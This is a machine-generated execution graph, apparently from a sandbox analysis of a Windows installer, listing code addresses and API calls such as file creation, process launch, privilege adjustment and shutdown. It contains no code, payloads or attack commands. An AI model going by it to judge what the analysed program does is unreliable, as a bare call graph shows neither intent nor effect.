                                                                                    execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3752 401423 3738->3752 3739 405f64 CharNextW 3739->3747 3749 40165b 3742->3749 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3749 3747->3736 3747->3739 3747->3744 3747->3745 3748 4015fa 3747->3748 3750 401617 GetFileAttributesW 3747->3750 3748->3747 3751 405b99 4 API calls 3748->3751 3750->3747 3751->3748 3753 4056ca 24 API calls 3752->3753 3754 401431 3753->3754 3755 406668 lstrcpynW 3754->3755 3755->3746 3936 401c43 3958 402d84 3936->3958 3938 401c4a 3939 402d84 17 API calls 3938->3939 3940 401c57 3939->3940 3941 402da6 17 API calls 3940->3941 3942 401c6c 3940->3942 3941->3942 3943 401c7c 3942->3943 3944 402da6 17 API calls 3942->3944 3945 401cd3 3943->3945 3946 401c87 3943->3946 3944->3943 3948 402da6 17 API calls 3945->3948 3947 402d84 17 API calls 3946->3947 3950 401c8c 3947->3950 3949 401cd8 3948->3949 3951 402da6 17 API calls 3949->3951 3952 402d84 17 API calls 3950->3952 3953 401ce1 FindWindowExW 3951->3953 3954 401c98 3952->3954 3957 401d03 3953->3957 3955 401cc3 SendMessageW 3954->3955 3956 401ca5 SendMessageTimeoutW 3954->3956 3955->3957 3956->3957 3959 4066a5 17 API calls 3958->3959 3960 402d99 3959->3960 3960->3938 3968 4028c4 3969 4028ca 3968->3969 3970 4028d2 FindClose 3969->3970 3971 402c2a 3969->3971 3970->3971 3777 4040c5 3778 4040dd 3777->3778 3779 40423e 3777->3779 3778->3779 3780 4040e9 3778->3780 3781 40424f GetDlgItem GetDlgItem 3779->3781 3786 40428f 3779->3786 3783 4040f4 SetWindowPos 3780->3783 3784 404107 3780->3784 3853 4045c4 3781->3853 3782 4042e9 3787 404610 SendMessageW 3782->3787 3795 404239 3782->3795 3783->3784 3788 404110 ShowWindow 3784->3788 3789 404152 3784->3789 3786->3782 3794 401389 2 API calls 3786->3794 3818 4042fb 3787->3818 3796 404130 GetWindowLongW 3788->3796 3797 40422b 3788->3797 3791 404171 3789->3791 3792 40415a DestroyWindow 3789->3792 3790 404279 KiUserCallbackDispatcher 3793 40140b 2 API calls 3790->3793 3799 404176 SetWindowLongW 3791->3799 3800 404187 3791->3800 3798 40456e 3792->3798 3793->3786 3801 4042c1 3794->3801 3796->3797 3803 404149 ShowWindow 3796->3803 3859 40462b 3797->3859 3798->3795 3810 40457e ShowWindow 3798->3810 3799->3795 3800->3797 3804 404193 GetDlgItem 3800->3804 3801->3782 3805 4042c5 SendMessageW 3801->3805 3803->3789 3808 4041c1 3804->3808 3809 4041a4 SendMessageW IsWindowEnabled 3804->3809 3805->3795 3806 40140b 2 API calls 3806->3818 3807 40454f DestroyWindow EndDialog 3807->3798 3812 4041ce 3808->3812 3815 404215 SendMessageW 3808->3815 3816 4041e1 3808->3816 3824 4041c6 3808->3824 3809->3795 3809->3808 3810->3795 3811 4066a5 17 API calls 3811->3818 3812->3815 3812->3824 3814 4045c4 18 API calls 3814->3818 3815->3797 3819 4041e9 3816->3819 3820 4041fe 3816->3820 3817 4041fc 3817->3797 3818->3806 3818->3807 3818->3811 3818->3814 3825 4045c4 18 API calls 3818->3825 3822 40140b 2 API calls 3819->3822 3821 40140b 2 API calls 3820->3821 3823 404205 3821->3823 3822->3824 3823->3797 3823->3824 3856 40459d 3824->3856 3826 404376 GetDlgItem 3825->3826 3827 404393 ShowWindow EnableWindow 3826->3827 3828 40438b 3826->3828 3873 4045e6 EnableWindow 3827->3873 3828->3827 3830 4043bd EnableWindow 3835 4043d1 3830->3835 3831 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3832 404406 SendMessageW 3831->3832 3831->3835 3832->3835 3834 4040a6 18 API calls 3834->3835 3835->3831 3835->3834 3874 4045f9 SendMessageW 3835->3874 3875 406668 lstrcpynW 3835->3875 3837 404435 lstrlenW 3838 4066a5 17 API calls 3837->3838 3839 40444b SetWindowTextW 3838->3839 3840 401389 2 API calls 3839->3840 3841 40445c 3840->3841 3841->3795 3841->3818 3842 40448f DestroyWindow 3841->3842 3844 40448a 3841->3844 3842->3798 3843 4044a9 CreateDialogParamW 3842->3843 3843->3798 3845 4044dc 3843->3845 3844->3795 3846 4045c4 18 API calls 3845->3846 3847 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3846->3847 3848 401389 2 API calls 3847->3848 3849 40452d 3848->3849 3849->3795 3850 404535 ShowWindow 3849->3850 3851 404610 SendMessageW 3850->3851 3852 40454d 3851->3852 3852->3798 3854 4066a5 17 API calls 3853->3854 3855 4045cf SetDlgItemTextW 3854->3855 3855->3790 3857 4045a4 3856->3857 3858 4045aa SendMessageW 3856->3858 3857->3858 3858->3817 3860 4046ee 3859->3860 3861 404643 GetWindowLongW 3859->3861 3860->3795 3861->3860 3862 404658 3861->3862 3862->3860 3863 404685 GetSysColor 3862->3863 3864 404688 3862->3864 3863->3864 3865 404698 SetBkMode 3864->3865 3866 40468e SetTextColor 3864->3866 3867 4046b0 GetSysColor 3865->3867 3868 4046b6 3865->3868 3866->3865 3867->3868 3869 4046c7 3868->3869 3870 4046bd SetBkColor 3868->3870 3869->3860 3871 4046e1 CreateBrushIndirect 3869->3871 3872 4046da DeleteObject 3869->3872 3870->3869 3871->3860 3872->3871 3873->3830 3874->3835 3875->3837 3975 4016cc 3976 402da6 17 API calls 3975->3976 3977 4016d2 GetFullPathNameW 3976->3977 3978 4016ec 3977->3978 3984 40170e 3977->3984 3980 40699e 2 API calls 3978->3980 3978->3984 3979 401723 GetShortPathNameW 3981 402c2a 3979->3981 3982 4016fe 3980->3982 3982->3984 3985 406668 lstrcpynW 3982->3985 3984->3979 3984->3981 3985->3984 3986 401e4e GetDC 3987 402d84 17 API calls 3986->3987 3988 401e60 GetDeviceCaps MulDiv ReleaseDC 3987->3988 3989 402d84 17 API calls 3988->3989 3990 401e91 3989->3990 3991 4066a5 17 API calls 3990->3991 3992 401ece CreateFontIndirectW 3991->3992 3993 402638 3992->3993 3993->3993 3994 402950 3995 402da6 17 API calls 3994->3995 3997 40295c 3995->3997 3996 402972 3999 406133 2 API calls 3996->3999 3997->3996 3998 402da6 17 API calls 3997->3998 3998->3996 4000 402978 3999->4000 4022 406158 GetFileAttributesW CreateFileW 4000->4022 4002 402985 4003 402a3b 4002->4003 4004 4029a0 GlobalAlloc 4002->4004 4005 402a23 4002->4005 4006 402a42 DeleteFileW 4003->4006 4007 402a55 4003->4007 4004->4005 4008 4029b9 4004->4008 4009 403371 44 API calls 4005->4009 4006->4007 4023 4035f8 SetFilePointer 4008->4023 4011 402a30 CloseHandle 4009->4011 4011->4003 4012 4029bf 4013 4035e2 ReadFile 4012->4013 4014 4029c8 GlobalAlloc 4013->4014 4015 4029d8 4014->4015 4016 402a0c 4014->4016 4017 403371 44 API calls 4015->4017 4018 40620a WriteFile 4016->4018 4021 4029e5 4017->4021 4019 402a18 GlobalFree 4018->4019 4019->4005 4020 402a03 GlobalFree 4020->4016 4021->4020 4022->4002 4023->4012 4031 403cd5 4032 403ce0 4031->4032 4033 403ce4 4032->4033 4034 403ce7 GlobalAlloc 4032->4034 4034->4033 4035 401956 4036 402da6 17 API calls 4035->4036 4037 40195d lstrlenW 4036->4037 4038 402638 4037->4038 4039 4014d7 4040 402d84 17 API calls 4039->4040 4041 4014dd Sleep 4040->4041 4043 402c2a 4041->4043 4044 4020d8 4045 4020ea 4044->4045 4055 40219c 4044->4055 4046 402da6 17 API calls 4045->4046 4047 4020f1 4046->4047 4049 402da6 17 API calls 4047->4049 4048 401423 24 API calls 4051 4022f6 4048->4051 4050 4020fa 4049->4050 4052 402110 LoadLibraryExW 4050->4052 4053 402102 GetModuleHandleW 4050->4053 4054 402121 4052->4054 4052->4055 4053->4052 4053->4054 4064 406aa4 4054->4064 4055->4048 4058 402132 4061 401423 24 API calls 4058->4061 4062 402142 4058->4062 4059 40216b 4060 4056ca 24 API calls 4059->4060 4060->4062 4061->4062 4062->4051 4063 40218e FreeLibrary 4062->4063 4063->4051 4069 40668a WideCharToMultiByte 4064->4069 4066 406ac1 4067 406ac8 GetProcAddress 4066->4067 4068 40212c 4066->4068 4067->4068 4068->4058 4068->4059 4069->4066 4070 402b59 4071 402b60 4070->4071 4072 402bab 4070->4072 4074 402ba9 4071->4074 4076 402d84 17 API calls 4071->4076 4073 406a35 5 API calls 4072->4073 4075 402bb2 4073->4075 4077 402da6 17 API calls 4075->4077 4078 402b6e 4076->4078 4079 402bbb 4077->4079 4080 402d84 17 API calls 4078->4080 4079->4074 4081 402bbf IIDFromString 4079->4081 4083 402b7a 4080->4083 4081->4074 4082 402bce 4081->4082 4082->4074 4088 406668 lstrcpynW 4082->4088 4087 4065af wsprintfW 4083->4087 4086 402beb CoTaskMemFree 4086->4074 4087->4074 4088->4086 4089 402a5b 4090 402d84 17 API calls 4089->4090 4091 402a61 4090->4091 4092 402aa4 4091->4092 4093 402a88 4091->4093 4098 40292e 4091->4098 4095 402abe 4092->4095 4096 402aae 4092->4096 4094 402a8d 4093->4094 4102 402a9e 4093->4102 4103 406668 lstrcpynW 4094->4103 4097 4066a5 17 API calls 4095->4097 4099 402d84 17 API calls 4096->4099 4097->4102 4099->4102 4102->4098 4104 4065af wsprintfW 4102->4104 4103->4098 4104->4098 3889 40175c 3890 402da6 17 API calls 3889->3890 3891 401763 3890->3891 3892 406187 2 API calls 3891->3892 3893 40176a 3892->3893 3894 406187 2 API calls 3893->3894 3894->3893 4105 401d5d 4106 402d84 17 API calls 4105->4106 4107 401d6e SetWindowLongW 4106->4107 4108 402c2a 4107->4108 4109 4028de 4110 4028e6 4109->4110 4111 4028ea FindNextFileW 4110->4111 4113 4028fc 4110->4113 4112 402943 4111->4112 4111->4113 4115 406668 lstrcpynW 4112->4115 4115->4113 4116 406d5f 4122 406be3 4116->4122 4117 40754e 4118 406c64 GlobalFree 4119 406c6d GlobalAlloc 4118->4119 4119->4117 4119->4122 4120 406ce4 GlobalAlloc 4120->4117 4120->4122 4121 406cdb GlobalFree 4121->4120 4122->4117 4122->4118 4122->4119 4122->4120 4122->4121 4123 401563 4124 402ba4 4123->4124 4127 4065af wsprintfW 4124->4127 4126 402ba9 4127->4126 4128 401968 4129 402d84 17 API calls 4128->4129 4130 40196f 4129->4130 4131 402d84 17 API calls 4130->4131 4132 40197c 4131->4132 4133 402da6 17 API calls 4132->4133 4134 401993 lstrlenW 4133->4134 4136 4019a4 4134->4136 4135 4019e5 4136->4135 4140 406668 lstrcpynW 4136->4140 4138 4019d5 4138->4135 4139 4019da lstrlenW 4138->4139 4139->4135 4140->4138 4148 40166a 4149 402da6 17 API calls 4148->4149 4150 401670 4149->4150 4151 40699e 2 API calls 4150->4151 4152 401676 4151->4152 4153 402aeb 4154 402d84 17 API calls 4153->4154 4155 402af1 4154->4155 4156 4066a5 17 API calls 4155->4156 4157 40292e 4155->4157 4156->4157 4158 4026ec 4159 402d84 17 API calls 4158->4159 4160 4026fb 4159->4160 4161 402745 ReadFile 4160->4161 4162 4061db ReadFile 4160->4162 4164 402785 MultiByteToWideChar 4160->4164 4165 40283a 4160->4165 4167 4027ab SetFilePointer MultiByteToWideChar 4160->4167 4168 40284b 4160->4168 4170 402838 4160->4170 4171 406239 SetFilePointer 4160->4171 4161->4160 4161->4170 4162->4160 4164->4160 4180 4065af wsprintfW 4165->4180 4167->4160 4169 40286c SetFilePointer 4168->4169 4168->4170 4169->4170 4172 406255 4171->4172 4175 40626d 4171->4175 4173 4061db ReadFile 4172->4173 4174 406261 4173->4174 4174->4175 4176 406276 SetFilePointer 4174->4176 4177 40629e SetFilePointer 4174->4177 4175->4160 4176->4177 4178 406281 4176->4178 4177->4175 4179 40620a WriteFile 4178->4179 4179->4175 4180->4170 4181 404a6e 4182 404aa4 4181->4182 4183 404a7e 4181->4183 4185 40462b 8 API calls 4182->4185 4184 4045c4 18 API calls 4183->4184 4186 404a8b SetDlgItemTextW 4184->4186 4187 404ab0 4185->4187 4186->4182 3895 40176f 3896 402da6 17 API calls 3895->3896 3897 401776 3896->3897 3898 401796 3897->3898 3899 40179e 3897->3899 3934 406668 lstrcpynW 3898->3934 3935 406668 lstrcpynW 3899->3935 3902 40179c 3906 4068ef 5 API calls 3902->3906 3903 4017a9 3904 405f37 3 API calls 3903->3904 3905 4017af lstrcatW 3904->3905 3905->3902 3926 4017bb 3906->3926 3907 40699e 2 API calls 3907->3926 3908 406133 2 API calls 3908->3926 3910 4017cd CompareFileTime 3910->3926 3911 40188d 3913 4056ca 24 API calls 3911->3913 3912 401864 3914 4056ca 24 API calls 3912->3914 3922 401879 3912->3922 3915 401897 3913->3915 3914->3922 3916 403371 44 API calls 3915->3916 3917 4018aa 3916->3917 3918 4018be SetFileTime 3917->3918 3919 4018d0 FindCloseChangeNotification 3917->3919 3918->3919 3921 4018e1 3919->3921 3919->3922 3920 4066a5 17 API calls 3920->3926 3924 4018e6 3921->3924 3925 4018f9 3921->3925 3923 406668 lstrcpynW 3923->3926 3927 4066a5 17 API calls 3924->3927 3928 4066a5 17 API calls 3925->3928 3926->3907 